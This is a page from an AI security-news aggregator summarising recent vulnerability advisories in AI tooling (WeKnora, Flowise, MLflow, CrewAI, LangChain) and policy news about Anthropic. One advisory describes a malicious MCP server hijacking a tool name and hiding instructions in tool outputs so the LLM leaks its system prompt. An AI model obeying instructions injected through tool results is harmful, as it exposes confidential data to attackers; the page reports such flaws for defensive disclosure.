aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,669
[LAST_24H]
19
[LAST_7D]
162
Daily BriefingMonday, March 30, 2026
>

Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)

Latest Intel

page 52/267
VIEW ALL
01

GHSA-2f4c-vrjq-rcgv: WeKnora has Broken Access Control - Cross-Tenant Data Exposure

security
Mar 6, 2026

WeKnora has a broken access control vulnerability (a security flaw where the application fails to properly check permissions) that lets any logged-in user from one tenant (a separate customer or organization) read sensitive data from other tenants' databases, including API keys (credentials for accessing external services), model configurations, and private messages. The problem happens because three database tables (messages, embeddings, models) are allowed to be queried but don't have automatic tenant filtering applied to them.

Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)

>

LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that need immediate application.

GitHub Advisory Database
02

GHSA-67q9-58vj-32qx: WeKnora Vulnerable to Tool Execution Hijacking via Ambigous Naming Convention In MCP client and Indirect Prompt Injection

security
Mar 6, 2026

WeKnora has a vulnerability where a malicious MCP server (a remote tool provider that integrates with AI clients) can hijack legitimate tools by exploiting how tool names are generated. An attacker registers a fake tool with the same name as a real one (like `tavily_extract`), which overwrites the legitimate version in the tool registry (the list of available tools). The attacker can then trick the LLM into executing their malicious tool and leak sensitive information like system prompts through prompt injection (hiding instructions in tool outputs that the AI treats as commands).

GitHub Advisory Database
03

GHSA-ccj6-79j6-cq5q: WeKnora Vulnerable to Broken Access Control in Tenant Management

security
Mar 6, 2026

WeKnora has a broken access control vulnerability (BOLA, or broken object-level authorization, where an attacker can access resources they shouldn't by manipulating object IDs) in its tenant management system that allows any authenticated user to read, modify, or delete any tenant without permission checks. Since anyone can register an account, attackers can exploit this to take over or destroy other organizations' accounts and access their sensitive data like API keys.

GitHub Advisory Database
04

Palantir rallies 15% for the week as Iran war boosts prospects, muting Anthropic concern

policyindustry
Mar 6, 2026

Palantir's stock rallied 15% this week after the U.S. attacked Iran, because the company relies on government spending for about 60% of its revenue and works heavily with military and intelligence agencies. Wall Street showed little concern about the U.S. government blacklisting Anthropic (an AI company that had partnered with Palantir on defense projects), as analysts noted there are alternative AI models available and that replacing Anthropic's systems will take time but is manageable.

CNBC Technology
05

GHSA-5f53-522j-j454: Flowise Missing Authentication on NVIDIA NIM Endpoints

security
Mar 6, 2026

Flowise incorrectly whitelisted the NVIDIA NIM router (`/api/v1/nvidia-nim/*`) in its authentication middleware, allowing anyone to access sensitive endpoints without logging in. This lets attackers steal NVIDIA API tokens, manipulate Docker containers, and cause denial of service attacks without needing valid credentials.

GitHub Advisory Database
06

GHSA-cwc3-p92j-g7qm: Flowise has IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration

security
Mar 6, 2026

Flowise has a critical IDOR (insecure direct object reference, a flaw where an app trusts user input to identify which data to access without checking permissions) vulnerability in its login configuration endpoint. An attacker with a free account can modify any organization's single sign-on settings by simply specifying a different organization ID, enabling account takeover by redirecting logins to attacker-controlled credentials and bypassing enterprise license restrictions.

GitHub Advisory Database
07

GHSA-mq4r-h2gh-qv7x: Flowise Allows Mass Assignment in `/api/v1/leads` Endpoint

security
Mar 6, 2026

A mass assignment vulnerability (a type of attack where an attacker controls internal fields by sending them in a request) exists in Flowise's `/api/v1/leads` endpoint, allowing unauthenticated users to override auto-generated fields like `id`, `createdDate`, and `chatId` by including them in the request body. The vulnerability occurs because the code uses `Object.assign()` to copy all properties from user input directly into the database entity without filtering, bypassing the intended auto-generation of these fields.

GitHub Advisory Database
08

Mayor Sadiq Khan invites embattled AI firm Anthropic to expand in London

policy
Mar 6, 2026

London Mayor Sadiq Khan invited AI company Anthropic to expand in the city after the U.S. Pentagon designated it a supply chain risk (a label meaning the government views the company as not secure enough to work with) because Anthropic refused to give defense agencies unrestricted access to its AI tools and raised concerns about using its Claude model for mass surveillance or autonomous military targeting. The company plans to challenge the Pentagon's designation in court, and Microsoft announced it would continue using Anthropic's technology except for the U.S. Department of Defense.

BBC Technology
09

CVE-2026-29791: Agentgateway is an open source data plane for agentic AI connectivity within or across any agent framework or environmen

security
Mar 6, 2026

Agentgateway is an open source data plane (a software layer that handles data movement for AI agents working across different frameworks) that had a security flaw in versions before 0.12.0, where user input in paths, query parameters, and headers were not properly cleaned up when converting tool requests to OpenAPI format. This lack of input validation (CWE-20, checking that data matches expected rules) could potentially be exploited, but the vulnerability has been patched.

Fix: This issue has been patched in version 0.12.0. Update Agentgateway to version 0.12.0 or later to resolve the vulnerability.

NVD/CVE Database
10

Amazon says Anthropic’s Claude still OK for AWS customers to use outside defense work

policyindustry
Mar 6, 2026

Amazon announced that AWS customers can continue using Anthropic's Claude AI models for all work except Department of Defense projects, after the federal government labeled Anthropic a "supply chain risk." Anthropic says it will challenge this designation in court, and major cloud providers (Amazon, Microsoft, and Google) are helping customers transition to alternative AI models for defense-related work.

CNBC Technology
Prev1...5051525354...267Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026